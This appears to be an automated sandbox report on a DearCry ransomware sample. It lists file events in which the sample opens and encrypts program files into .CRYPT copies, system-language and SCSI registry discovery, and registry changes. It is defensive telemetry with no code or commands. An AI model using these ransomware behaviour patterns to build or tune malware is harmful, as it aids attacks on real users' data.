File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\AppxManifest.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-72_altform-lightunplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\UIAutomationProvider.resources.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\librtpvideo_plugin.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSplashLogo.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-96_altform-unplated_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\AppxManifest.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-60_altform-unplated_contrast-black.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko\UIAutomationClient.resources.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageSplashScreen.scale-125_contrast-black.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-150.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\ui-strings.js.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-sysinfo-l1-1-0.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-180.png.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Collections.NonGeneric.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.XLHost.Modeler.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOARIA.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Ear.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeLargeTile.scale-400.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libvc1_plugin.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\Assets\AppSplashScreen.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_altform-unplated_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.187.41\msedgeupdate.dll.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-time-l1-1-0.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\tracedefinition130.xml.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\THMBNAIL.PNG.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A

Checks SCSI registry key(s)

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	C:\Windows\explorer.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	C:\Windows\explorer.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	C:\Windows\explorer.exe	N/A

Modifies Internet Explorer settings

adware spyware

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Internet Explorer\GPU	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\MuiCache	C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	C:\Windows\explorer.exe	N/A
Set value (data)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\MuiCache	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	N/A
